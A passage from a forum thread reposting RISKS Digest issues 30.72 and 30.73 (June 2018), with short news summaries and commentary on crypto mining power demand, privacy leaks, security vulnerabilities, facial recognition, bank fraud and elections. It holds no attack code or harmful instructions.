    Subject: Quebec Halts Bitcoin Mining Power Requests Amid Booming Demand
    (Bloomberg)

    Hydro-Quebec will temporarily stop processing requests from cryptocurrency
    miners so that it can continue to fulfill its obligations to supply
    electricity to the entire province.

    Canada's biggest electric utility is facing unprecedented demand from
    blockchain companies that exceeds Hydro-Quebec's short- and medium-term
    capacity, according to a statement Thursday. In the coming days,
    Hydro-Quebec will file an application to the province's energy regulator
    proposing a selection process for blockchain industry projects.

    Hydro-Quebec has been courting cryptocurrency miners in recent months in a
    bid to soak up surplus energy from dams in northern Quebec. Power rates in
    the province are the lowest in North America, both for consumers and
    industrial customers.

    https://www.msn.com/en-us/news/mark...power-requests-amid-booming-demand/ar-AAylZv3

    Always risky, getting what you want.

    Then, there's this...
    https://techcrunch.com/2018/06/08/ibms-new-summit-supercomputer-for-the-doe-delivers-200-petaflops/

    ...which one commenter somewhere suggests should be used to mine bitcoins.
    Besides petaflop ratings, we need potential kWh/bitcoin comparisons.

    ------------------------------

    Date: Sun, 10 Jun 2018 21:01:19 -0400
    From: Jose Maria Mateos <ch...@rinzewind.org>
    Subject: The Spanish Liga uses the phone microphone of millions of fans
    to spy on bars (El Diario)

    Original article (in Spanish):
    https://www.eldiario.es/tecnologia/Liga-Futbol-microfono-telefono-aficionados_0_780772124.html

    Automated translation:
    https://translate.google.com/transl...lefono-aficionados_0_780772124.html&edit-text

    The Liga de Fútbol Profesional, the body that runs the most important
    sports competition in Spain, is using mobile phones of football fans to spy
    on bars and other public establishments that put matches for their
    clients. Millions of people in Spain have this application on their phone,
    which accumulates more than 10 million downloads, according to data from
    Google and Apple.

    All of these people can become undercover informants for La Liga and the
    owners of football television broadcasting rights. If they give their
    consent for the app to use the device's microphone (which is common in many
    applications), they are actually giving permission for La Liga to remotely
    activate the phone's microphone and try to detect if what it sounds like is
    a bar or public establishment where a football match is being projected
    without paying the fee established by the chains that own the broadcasting
    rights. In addition, use the geolocation of the phone to locate exactly
    where that establishment is located.

    ------------------------------

    Date: Fri, 8 Jun 2018 17:10:09 -0400
    From: Mark Rockman <user...@mdrsesco.biz>
    Subject: Navy Contractor Hacked: Reams of Secret Documents Taken (WashPo)

    *The Washington Post* reports "Chinese government hackers have compromised
    the computers of a Navy contractor, stealing massive amounts of highly
    sensitive data related to undersea warfare - including secret plans to
    develop a supersonic anti-ship missile for use on U.S. submarines by 2020,
    according to American officials. " Gee. Do you think connecting secret
    documents to the Internet is wise? Good thing the Manhattan Project only
    had a Russian spy in their midst. Otherwise the Soviets may have stolen
    nuclear secrets and got the bomb before 1949.

    https://www.washingtonpost.com/worl...8eb28bc52b1_story.html?utm_term=.e6cf621eb36c

    [Also noted by Jose Maria Mateos. PGN]

    ------------------------------

    Date: Thu, 7 Jun 2018 07:50:14 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: G Suite leaks in 10,000+ orgs: Google UX blamed, fury at no-bug
    defense (TechBeacon)

    via NNSquad
    https://techbeacon.com/g-suite-leaks-10000-orgs-google-ux-blamed-fury-no-bug-defense

    People keep misconfiguring G Suite to leak their companies' private
    data. An estimated 10,000 or more organizations are affected. Google
    denies it's a bug, passive-aggressively telling people to RTFM. But that's
    not the point, is it? Given the scale of the problem, shouldn't la GOOG be
    fixing an obvious admin UX problem?

    When you blame the users in situations like this, you've already lost the
    argument.

    ------------------------------

    Date: Fri, 08 Jun 2018 20:28:37 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Password reset flaw at Internet giant Frontier allowed account
    takeovers" (Zack Whittaker)

    Zack Whittaker for Zero Day (8 Jun 2018)
    Password reset flaw at Internet giant Frontier allowed account takeovers
    A two-factor code used to reset an account password could be easily bypassed.
    https://www.zdnet.com/article/password-reset-flaw-at-frontier-allowed-account-takeovers/

    opening text:

    A bug in how cable and Internet giant Frontier reset account passwords
    allowed anyone to take over user accounts.

    The vulnerability, found by security researcher Ryan Stevenson, allows a
    determined attacker to take over an account with just a username or email
    address. And a few hours worth of determination, an attacker can bypass the
    access code sent during the password reset process.

    ------------------------------

    Date: Mon, 11 Jun 2018 10:04:32 -0600
    From: "Matthew Kruk" <mkr...@gmail.com>
    Subject: Why a DNA data breach is much worse than a credit card leak
    (The Verge)

    https://www.theverge.com/2018/6/6/17435166/myheritage-dna-breach-genetic-privacy-bioethics

    ------------------------------

    Date: Fri, 08 Jun 2018 20:31:02 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Facebook gave some companies extended access to user data"
    (Stephanie Condon)

    Stephanie Condon for Between the Lines (ZDNet), 8 Jun 2018
    Facebook's acknowledgement of these agreements is the latest incident to
    shed light on the way the company has shared user data in ways users are
    unlikely to understand.
    https://www.zdnet.com/article/facebook-gave-some-companies-extended-access-to-user-data/

    opening text:

    In the latest revelation about Facebook's data-sharing practices, the social
    media giant acknowledged Friday that it gave certain companies extended,
    special access to user data in 2015 -- data that was already off limits to
    most developers.

    ------------------------------

    Date: Thu, 7 Jun 2018 13:39:07 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Facebook bug made up to 14 million users' posts public for days
    (WiReD)

    via NNSquad
    https://www.wired.com/story/facebook-bug-14-million-users-posts-public/

    FACEBOOK HAS FOUND itself the subject of another privacy scandal, this
    time involving privacy settings. A glitch caused up to 14 million Facebook
    users to have their new posts inadvertently set to public, the company
    revealed Thursday.

    "Private" posts that turned out to be public. Pretty much a worst case
    scenario.

    ------------------------------

    Date: Fri, 08 Jun 2018 20:21:00 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Cisco fixes critical bug that exposed networks to hackers"
    (Zack Whittaker)

    Zack Whittaker, ZDNet, 7 Jun 2018
    The bug had a rare 9.8 out of 10 score on the common vulnerability
    severity rating scale.
    https://www.zdnet.com/article/cisco-fixes-critical-bug-that-exposed-networks-to-hackers/

    opening text:

    A "critical"-rated bug in one of Cisco's network access management devices
    could have allowed hackers to remotely break into corporate networks.

    ------------------------------

    Date: Fri, 08 Jun 2018 20:34:03 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Meet Norman, the world's first 'psychopathic' AI"
    (Charlie Osborne)

    Charlie Osborne for Between the Lines (ZDNet) 7 Jun 2018
    While you see flowers, Norman sees gunfire.
    https://www.zdnet.com/article/meet-norman-the-worlds-first-psychopathic-ai/

    selected text:

    Researchers at the Massachusetts Institute of Technology (MIT) have
    developed what is likely a world first -- a "psychopathic" artificial
    intelligence (AI).

    Norman is an AI system trained to perform image captioning, in which deep
    learning algorithms are used to generate a text description of an image.

    However, after plundering the depths of Reddit and a select subreddit
    dedicated to graphic content brimming with images of death and destruction,
    Norman's datasets are far from what a standard AI would be exposed to.

    The results are disturbing, to say the least.

    In one inkblot test, a standard AI saw "a black and white photo of a red and
    white umbrella," while Norman saw "man gets electrocuted while attempting to
    cross busy street."

    ------------------------------

    From: Richard M Stein <rms...@ieee.org>
    Date: Tue, 5 Jun 2018 06:21:03 -0700
    Subject: Should We Always Trust What We See in Satellite Images?
    (Scientific American)

    https://www.scientificamerican.com/article/should-we-always-trust-what-we-see-in-satellite-images/

    The author argues that an "on the ground" confirmation is a wise precaution
    to verify imagery content. Image processing algorithms can render misleading
    impressions which affect major decisions.

    "One example of the misuse of remotely sensed data was in 2003, when
    satellite images were used as evidence of sites of weapons of mass
    destruction in Iraq. These images revealed what were identified as active
    chemical munitions bunkers and areas where earth had been graded and moved
    to hide evidence of chemical production. This turned out not to be the
    case."

    "Trust but verify" remains a wise precaution to follow when analyzing
    satellite imagery.

    ------------------------------

    Date: Tue, 12 Jun 2018 13:20:23 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The NSA Just Released 136 Historical Propaganda Posters
    (Motherboard)

    https://motherboard.vice.com/en_us/article/43548d/nsa-historical-propaganda-posters-foia

    ------------------------------

    Date: Fri, 08 Jun 2018 06:56:43 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Unproven facial-recognition companies target schools, promising an
    end to shootings (WashPo)

    http://www.washingtonpost.com/busin...ory.html?noredirect=on&utm_term=.3fccfa98bcd2

    "Although facial recognition remains unproven as a deterrent to school
    shootings, the specter of classroom violence and companies intensifying
    marketing to local education officials could cement the more than 130,000
    public and private schools nationwide as one of America's premier testing
    grounds -- both for the technology's abilities and for public acceptance
    of a new generation of mass surveillance."

    Mass shootings at schools in the US, while statistically rare compared to
    other gun-related deaths (suicide, for instance), are horrifying events. A
    set of companies are pitching facial recognition technology as a bromide and
    deterrent, though they are coy to explain how their software stacks function
    or enable deterrence. Exploiting fear and anxiety are long-practiced sales
    techniques.

    ------------------------------

    Date: Wed, 6 Jun 2018 20:30:31 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: The Zip Slip vulnerability: what you need to know (Naked Security)

    Thanks to SRI's Steven Cheung for spotting this one.

    A fun vulnerability that uses zip files to overwrite files

    https://nakedsecurity.sophos.com/2018/06/06/the-zip-slip-vulnerability-what-you-need-to-know/

    ------------------------------

    Date: Fri, 8 Jun 2018 12:29:03 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: All the people Apple just pissed off to better protect your privacy
    (Fast Company)

    When Apple previewed the upcoming iOS 12 and MacOS Mojave at this week's
    WWDC keynote,
    http://www.fastcompany.com/40578098/watch-apple-wwdc-livestream-live-coverage

    The killer new features that got both developers and users most excited were
    the ones you'd would expect: the visually stunning Dark Mode on MacOS, the
    insanely customizable Memojis on iOS, FaceTime group-calling features on
    both platforms, massive improvements to Siri, and Apple's all-new Screen
    Time digital health tracking tools.

    <http://www.fastcompany.com/40580992/macos-mojave-brings-dark-mode-better-privacy-and-more-ios-ideas>
    <http://www.fastcompany.com/40580906/apples-latest-animoji-you>
    <http://www.fastcompany.com/40580873/siri-wants-to-automate-your-life-with-shortcuts>
    <http://www.fastcompany.com/40581638...ome-real-responsible-use-features-but-why-now>

    All those features deserved the applause they got from the crowd. But it
    was other updates -- definitely less sexy and headline-grabbing -- that set
    Apple apart from other technology giants. I'm talking about the new privacy
    features built into both iOS 12 and MacOS Mojave that make it so much harder
    for other parties to get at your personal information.
    https://www.fastcompany.com/4058169...ust-pissed-off-to-better-protect-your-privacy

    ------------------------------

    Date: Fri, 8 Jun 2018 13:40:11 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Recounting 'Horror Stories' Over Guitar Center's Warranties (NYT)

    https://www.nytimes.com/2018/06/07/business/guitar-center-warranty.html

    Former employees and customers at the giant music retailer described
    problems with how it sells protection plans, particularly in Puerto Rico.

    ------------------------------

    Date: Fri, 8 Jun 2018 13:41:23 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Add Bryan Colangelo to the long list who have been burned by social
    media (ESPN)

    http://www.espn.com/nba/story/_/id/...-line-sports-figures-run-trouble-social-media

    ------------------------------

    Date: Tue, 5 Jun 2018 10:27:01 -0400
    From: John Ohno <john...@gmail.com>
    Subject: Microsoft, Github, & distributed revision control (Medium)

    Originally posted here:
    3Dhttps://medium.com/%40enkiv2/microsoft-github-and-distributed-revision-control-c563b5e98d17

    Microsoft, Github, and distributed revision control

    People legitimately criticize Github for creating artificial centralization
    of open source software & having a dysfunctional internal culture, and for
    being a for-profit company. Microsoft's acquisition may not make any of
    these things worse, & won't make them better. But, there's a really specific
    & practical reason people not already boycotting github have begun to
    consider it in response to the Microsoft acquisition: Microsoft's history of
    using deals, acquisitions, & standards committees as anticompetitive tools.

    Github was never going to do much of anything beside host your projects, and
    since hosting your projects is its main business, it's not going to do nasty
    things like delete them. Microsoft, however, is absolutely willing to do
    that kind of thing if they decide they can get away with it. History bears
    this out -- some of it recent. Microsoft hasn't been able to do it to the
    likes of IBM or Netscape since the 90s, but only because their complacency
    over the PC market has prevented them from being able to successfully branch
    out into phones or servers; however, they have been happily performing their
    embrace-extend-exterminate tactic on open source projects for the past
    fifteen years.

    (Note: If Github got as big as Microsoft & had side hustles as profitable,
    they would do the same thing. This isn't about particular organizations
    being evil -- capitalism forces organizations to act unethically and
    illegally by punishing those unwilling to break the law.)

    People concerned about open source software distribution being centralized
    under the aegis of unreliable for-profit companies have been boycotting
    Github & Gitlab for years, and Google Code and Sourceforge before that.
    They've also been working on alternatives to central repositories.

    Named data networking goes beyond simply ensuring that the owner of the
    hostname is not a for-profit company (liable to throw out your data as soon
    as they decide that it'll make them money to do so). Instead, DNS as a
    single point of failure goes away entirely, along with reliance on data
    centers.

    If you're considering migrating away from Github -- even if the recent news
    merely reminded you of problems Github has had for years -- take this
    opportunity to migrate your repository to git-ssb or git-ipfs, instead of
    moving to another temporary host-tied third party thing like gitlab or
    bitbucket. Your commits are already identified by hashes, so why not switch
    to hashes entirely & use an NDN/DHT system? That way, there's no third party
    that could take down your commits if it goes down. The entire DNS system
    could die permanently & it wouldn't interrupt your development.

    ------------------------------

    Date: Mon, 11 Jun 2018 16:54:09 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: How the body could power pacemakers and other implantable devices
    (Charles Q. Choi)

    [From ocean wave motions to lungs! Great idea. PGN]

    Charles Q. Choi, *The Washington Post*, 9 Jun 2018
    http://www.washingtonpost.com/natio...d287b0-5559-11e8-a551-5b648abe29ef_story.html

    In I Sing the Body Electric, poet Walt Whitman waxed lyrically about the
    action and power of beautiful, curious, breathing, laughing flesh. More
    than 150 years later, MIT materials scientist and engineer Canan Dagdeviren
    and colleagues are giving new meaning to Whitman's poem with a device that
    can generate electricity from the way it distorts in response to the beating
    of the heart.

    Despite tremendous technological advances, a key drawback of most wearable
    and implantable devices is their batteries, whose limited capacities
    restrict their long-term use. The last thing you want to do when a pacemaker
    runs out of power is to open up a patient just for battery replacement.

    The solution may rest inside the human body -- rich in energy in its
    chemical, thermal and forms.

    The bellows-like motions that a person makes while breathing, for example,
    can generate 0.83 watts of power; the heat from a body, up to 4.8 watts; and
    the motions of the arms, up to 60 watts. That's not nothing when you
    consider that a pacemaker needs just 50 millionths of a watt to last for
    seven years, a hearing aid needs a thousandth of a watt for five days, a
    smartphone requires one watt for five hours.

    Increasingly, Dagdeviren and others are investigating a plethora of ways
    that devices could make use of these inner energy resources and are testing
    such wearable or implantable devices in animal models and people.

    Good vibrations

    One energy-harvesting strategy involves converting energy from vibrations,
    pressure and other mechanical stresses into electrical energy. This
    approach, producing what is known as piezoelectricity, is often used in
    loudspeakers and microphones.

    To take advantage of piezoelectricity, Dagdeviren and colleagues have
    developed flat devices that can be stuck onto organs and muscles such as the
    heart, lungs and diaphragm. Their mechanical properties are similar to
    whatever they are laminated onto, so they don't hinder those tissues when
    they move.

    So far, such devices have been tested in cows, sheep and pigs, animals with
    hearts roughly the same size as those of people. ``When these devices
    mechanically distort, they create positive and negative charges, voltage and
    current -- and you can collect this energy to recharge batteries, You can
    use them to run biomedical devices like cardiac pacemakers instead of
    changing them every six or seven years when their batteries are depleted.''

    Scientists are also developing wearable piezoelectric energy harvesters that
    can be worn on joints such as the knee or elbow, or in shoes, trousers or
    underwear. People could generate electricity for electronics whenever they
    walk or bend their arms.

    Body heat

    A different energy-harvesting approach uses thermoelectric materials to
    convert body heat to electricity. ``Your heart beats more than 40 million
    times a year,'' Dagdeviren notes. All that energy is dissipated as heat in
    the body -- it's a rich potential source to capture for other uses.

    Thermoelectric generators face key challenges. They rely on temperature
    differences, but people usually keep a fairly constant temperature
    throughout their bodies, so any temperature differences found within are
    generally not dramatic enough to generate large amounts of electricity. But
    this is not a problem if the devices are exposed to relatively cool air in
    addition to the body's continuous warmth.

    Scientists are exploring thermo-electric devices for wearable purposes, such
    as powering wristwatches. In principle, the heat from a human body can
    generate enough electricity to power wireless health monitors, cochlear
    implants and deep-brain stimulators to treat disorders such as Parkinson's
    disease.

    Static and dynamic

    Scientists have also sought to use the same effect behind everyday static
    electricity to power devices. When two different materials repeatedly
    collide with, or rub against, one another, the surface of one material can
    steal electrons from the other, accumulating a charge, a phenomenon known as
    triboelectricity. Nearly all materials, both natural and synthetic, are
    capable of creating triboelectricity, giving researchers a wide range of
    choices for designing gadgets.

    Nanotechnologist Zhong Lin Wang of Georgia Tech:

    ``The more I work with triboelectricity, the more exciting it gets, and
    the more applications it might have. I can see myself devoting the next
    20 years to it.''

    ------------------------------

    Date: Mon, 11 Jun 2018 11:58:20 -0500
    From: David Strom via WebInformant <webinf...@list.webinformant.tv>
    Subject: Having better risk-based analysis for your banks and credit cards

    David Strom's Web Informant, 11 Jun 2018
    [TNX to Gabe Goldberg]

    When someone tries to steal money from your bank or credit card accounts,
    these days it is a lot harder, thanks to a number of technologies. I
    recently personally had this situation. Someone tried to use my credit card
    on the other side of Missouri on a Sunday afternoon. Within moments, I got
    alerts from my bank, along with a toll-free number to call to verify the
    transactions. In the heat of the moment, I dialed the number and started
    talking to my bank's customer service representatives. Then it hit me: what
    if I were being phished? I told the person that I was going to call them
    back, using the number on the back of my card. Once I did, I found out I was
    talking to the right people after all, but still you can't be too careful.

    This heat-of-the-moment reaction is what the criminals count on, and how
    they prey on your heightened emotional state. In my case, I was well into my
    first call before I started thinking more carefully about the situation, so
    I could understand how phishing attacks can often work, even for experienced
    people.

    To help cut down on these sorts of exploits, banks use a variety of
    risk-based or adaptive authentication technologies that monitor your
    transactions constantly, to try to figure out if it really is you doing them
    or someone else. In my case, the pattern of life didn't fit, even though it
    was a transaction taking place only a few hundred miles away from where I
    lived. Those of you who travel internationally probably have come across
    this situation: if you forget to tell your bank you are traveling, your
    first purchase in a foreign country may be declined until you call them and
    authorize it. But now the granularity of what can be caught is much finer,
    which was good news for me.

    These technologies can take several forms: some of them are part of identity
    management tools or multi-factor authentication tools, others come as part
    of regular features of cloud access security brokers. They aren't
    inexpensive, and they take time to implement properly. In a story I wrote
    last month for CSOonline
    <https://www.csoonline.com/article/3...me-an-essential-security-tool.html#tk.twt_cso
    I discuss what IT managers need to know to make the right purchasing
    decision.

    In that article, I also talk about these tools and how they have matured
    over the past few years. As we move more of our online activity to mobiles
    and social networks, hackers are finding ways at leveraging our identity in
    new and sneaky ways. One-time passwords that are being sent to our phones
    can be more readily intercepted, using the knowledge that we broadcast on
    our social media. And to make matters worse, attackers are also getting
    better at conducting blended attacks that can cut across a website, a mobile
    phone app, voice phone calls, and legacy on-premises applications.

    Of course, all the tech in the world doesn't help if your bank can't respond
    quickly when you uncover some fraudulent activity. Criminals specifically
    targeted a UK bank that was having issues with switching over its computer
    systems last month knowing that customers would have a hard time getting
    through to its customer support call centers. The linked article documents
    how one customer waited on hold for more than four hours, watching while
    criminals took thousands of pounds out of his account. Other victims were
    robbed of five and six-figure sums after falling for phishing messages
    that asked them to input their login credentials.

    <https://www.welivesecurity.com/2018/05/28/scammers-drain-mans-bank-account-fraud-hotline/

    The moral of the story: don't panic when you get a potentially dire fraud
    alert message. Take a breath, take time to think it through. And call your
    bank when in doubt.

    Comments always welcome here: http://blog.strom.com/wp/?p=6568

    ------------------------------

    Date: Tue, 12 Jun 2018 15:44:00 -0400
    From: Phil Smith III <phsiii@gmail.
    Subject: Having better risk-based analysis for your banks and credit cards

    What continues to bug me is that banks don't ask, ``Did you call this number
    from the back of your card?'' Those of us who did will say ``Of course'',
    but we aren't the ones to worry about. I've gotten calls from banks asking
    me about transactions; when I said ``I will call you back'', they said
    ``Fine, of course.'' But they SHOULD have started the call with ``This is
    TBTF Bank, calling about a questionable transaction on your Visa card. To
    ensure that this is a legitimate conversation, please call us back at the
    number on the back of your card.''

    ------------------------------

    Date: Mon, 11 Jun 2018 22:22:41 +0100
    From: Chris Drewe <e76...@yahoo.co.uk>
    Subject: Re: Securing Elections (Shapir, R 30 71)

    This is similar in Britain (not that I'm a constitutional expert).
    Candidates stand for election in each electoral area, and we vote for which
    one we want to serve as our Member of Parliament. The winner is the one
    with most votes -- the 'first-past-the-post' system. Usually one of the big
    parties gets a majority of MPs so forms the government directly, but
    sometimes (as at the present time) the biggest party needs a support
    agreement with a smaller party to get a majority. While this may seem like
    an elected dictatorship, it's obvious who is in charge, and we get the
    chance to vote them out at the next election.

    By contrast, as I understand it, mainland European countries often have a
    large number of small parties so coalitions are the usual arrangement. The
    problem here is that much policy-making may be hidden in behind-the-scenes
    deals between parties, i.e. a party may have to support something that it
    doesn't want to get something that it does, or vice-versa. This can give
    unstable governments as in Italy as the original poster said, or the
    opposite when an election just changes a few of the elected representatives
    and everything continues as as before. The EU seems to be based on the
    European model, with a large bureaucracy notionally governed by a small,
    unfocused elected assembly, which may account for the fractious relationship
    between the UK and the EU; indeed, a cynic such as myself may feel that the
    aim is to create the impression of democracy rather than giving power to
    voters.

    As British MPs are elected regionally, there's no direct correlation between
    the total number of votes gained by parties and the numbers of their MPs, so
    there are periodic campaigns to adopt some kind of proportional
    representation system, though this brings various other problems. A bigger
    problem is potential voter-identity fraud, a frequent topic in RISKS.
    There's talk of requiring voters to show some proof of identity at polling
    stations, but what, as there's no particular official UK identity document?

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.72
    ************************
     
  7. LakeGator

    LakeGator Mostly Harmless Moderator VIP Member

    4,755
    483
    283
    Apr 3, 2007
    Tampa
    Risks Digest 30.73

    RISKS List Owner

    Jun 26, 2018 9:13 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Tuesday 26 June 2018 Volume 30 : Issue 73

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Tim Cook on Why Apple News Needs Human Editors (The Wrap)
    Facial Recognition Company Kairos CEO argues that technology's bias and
    capacity for abuse make it too dangerous for use by law enforcement
    (Slashdot)
    Police Use of Facial Recognition With License Databases Spur Privacy
    Concerns (WSJ via WaPo)
    Thermostats, Locks and Lights: Digital Tools of Domestic Abuse (NYTimes)
    Adverse Events in Robotic Surgery: A Retrospective Study of
    14 Years of FDA Data (arxiv.org)
    When the Robot Doesn't See Dark Skin (NY Times)
    Having better risk-based analysis for your banks and credit cards (Rex Sanders)
    It's time to stop laughing at Nigerian scammers, because they're stealing
    billions of dollars (Cleve R. Wootson Jr.)
    Those Chinese-language robocalls are a scam to get your bank information,
    officials say (WashPo)
    How a company outed China's spies: David Sanger (Gabe Goldberg)
    Chinese Fans Paid Dearly for World Cup Tickets That Never Materialized.
    (NYTimes)
    Germany becomes the last big Western power to buy killer robots
    (Innocence lost -- The Economist)
    Orlando Airport Becomes 1st In US To Require Face Scan Of All
    International Travelers (Talking Points Memo)
    Cryptocurrency exchange hacks in 2018 (Taipei Times)
    Bitcoin Could Break the Internet, Central Banks' Overseer Says (Bloomberg)
    West Virginia Becomes First State to Test Mobile Voting by Blockchain in
    a Federal Election (GovTech)
    The Tractors that Turn Farmers into Hackers (Now I Know)
    "Three-month-old Drupal vulnerability is being used to deploy cryptojacking
    malware" (Danny Palmer)
    Hacker figured out how to brute-force iPhone passcode (ZDNet)
    Supreme Court says police need a warrant for historical cell location records
    (Zach Whittaker)
    Why Hackers Aren't Afraid of Us (David E. Sanger)
    Beijing subways to get bio-ID system (StraitsTimes)
    Scanning immigrants old fingerprints, U.S. threatens to strip thousands of
    citizenship (WashPo)
    M&A isn't what it used to be (Fortune)
    A new way to do big data with entity resolution (Web Informant)
    Tesla sues former employee for allegedly stealing gigabytes of data,
    making false claims to media. (CNBC)
    Show me the money (Fortune)
    Visa fingers 'very rare' datacentre switch glitch for payment meltdown
    (The Register)
    Recounting Horror Stories? Over Guitar Center's Warranties (NYTimes)
    The Guy Who Robbed Someone at Gunpoint for a Domain Name Is Getting
    20 Years in Jail (Motherboard)
    Clarinetist discovers his ex-girlfriend faked a rejection letter
    from his dream school (The Washington Post)
    Internet TV firmware update/soft power-switch failure (Richard M Stein)
    Ghost Cytometry May Improve Cancer Detection, Enable New Experiments (SciAm)
    Creating bizarre interfaces (Rob Slade)
    More dodgy numbers - LinkedIn this time (Tony Harminc)
    Maybe they'll accept postcard calls for help (Gabe Goldberg)
    Re: Another risk of driverless cars (Ed Ravin)
    Re: Microsoft, Github, & distributed revision control (Wol)
    Re: Florida skips gun background checks for a year after employee
    (R A Lichtensteiger, Gabe Goldberg)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Tue, 26 Jun 2018 08:41:03 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Tim Cook on Why Apple News Needs Human Editors (The Wrap)

    [It seems nice to find a use for human Natural Intelligence after all,
    in this era of relying on Artificial Intelligence and Machine Learning.
    PGN]

    Tim Cook wants your news experience to be a little less stressful -- and
    that's why Apple is leaning on humans, rather than algorithms, to
    highlight its top stories in Apple News, according to the exec. "News was
    kind of going a little crazy," said Cook on Monday night at the Fortune
    CEO Initiative conference in San Francisco, explaining Apple's latest
    attempt to curb polarization. Apple's solution, unveiled earlier in the
    day, was a new, curated tab for coverage of the 2018 midterm
    elections. The stories will be picked by human editors, and will offer
    coverage from a variety of viewpoints, from Vox to Fox News. "For Apple
    News, we felt top stories should be selected by humans," said Cook, "to
    make sure you're not picking content that strictly has the goal of
    enraging people."
    Tim Cook Explains Why Apple News Needs Human Editors

    ------------------------------

    Date: Mon, 25 Jun 2018 11:27:38 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Facial Recognition Company Kairos CEO argues that technology's bias
    and capacity for abuse make it too dangerous for use by law enforcement
    (Slashdot)

    Facial recognition technologies, used in the identification of suspects,
    negatively affects people of color. To deny this fact would be a lie. And
    clearly, facial recognition-powered government surveillance is an
    extraordinary invasion of the privacy of all citizens -- and a slippery
    slope to losing control of our identities altogether.

    via NNSquad
    CEO of Facial Recognition Company Kairos Argues that the Technology's Bias and Capacity For Abuse Make It Too Dangerous For Use By Law Enforcement - Slashdot

    ------------------------------

    Date: Mon, 18 Jun 2018 08:43:34 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Police Use of Facial Recognition With License Databases Spur Privacy
    Concerns (WSJ via WaPo)

    Behind WSJ paywall --
    Police Use of Facial Recognition With License Databases Spur Privacy Concerns

    WaPo linkage to WSJ story with commentary quoted below --
    Analysis | The Cybersecurity 202: Trump associates may need a lesson on how to use their encrypted apps
    (See "Facial recognition versus privacy" in "The Cybersecurity 202," by
    Derek Hawkins.)

    'A detective fed an image taken from an Instagram picture provided by the
    victim into Maryland's face recognition system and the database returned
    the driver's license photo of the suspect, Elinson writes. ``This
    digital-age crime-solving technique is at the center of a debate between
    privacy advocates and law-enforcement officials: Should police be able to
    search troves of driver's license photos, many who have never been
    convicted of a crime, with facial recognition software?'' Elinson writes.'

    Possible 4th amendment violtation of the US Constitution covering
    illegal search and seizure. Jacobsen v. United States defined 'search'
    and 'seizure' for the 4th amendment:

    "protects two types of expectations, one involving 'searches', the other
    'seizures'. A search occurs when an expectation of privacy that society is
    prepared to consider reasonable is infringed. A seizure of property occurs
    where there is some meaningful interference with an individual's
    possessory interests in that property."

    https://en.wikipedia.org/wiki/Search_and_seizure

    A blanket search and happenstance match across a unified motor vehicle photo
    database apparently violates that standard.

    ------------------------------

    Date: Sat, 23 Jun 2018 21:08:14 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Thermostats, Locks and Lights: Digital Tools of Domestic Abuse
    (NYTimes)

    http://www.nytimes.com/2018/06/23/technology/smart-home-devices-domestic-abuse.html

    Their stories are part of a new pattern of behavior in domestic abuse
    cases tied to the rise of smart home technology. Internet-connected
    locks, speakers, thermostats, lights and cameras that have been marketed
    as the newest conveniences are now also being used as a means for
    harassment, monitoring, revenge and control. In more than 30 interviews
    with The New York Times, domestic abuse victims, their lawyers, shelter
    workers and emergency responders described how the technology was becoming
    an alarming new tool. Abusers -- using apps on their smartphones, which
    are connected to the Internet-enabled devices -- would remotely control
    everyday objects in the home, sometimes to watch and listen, other times
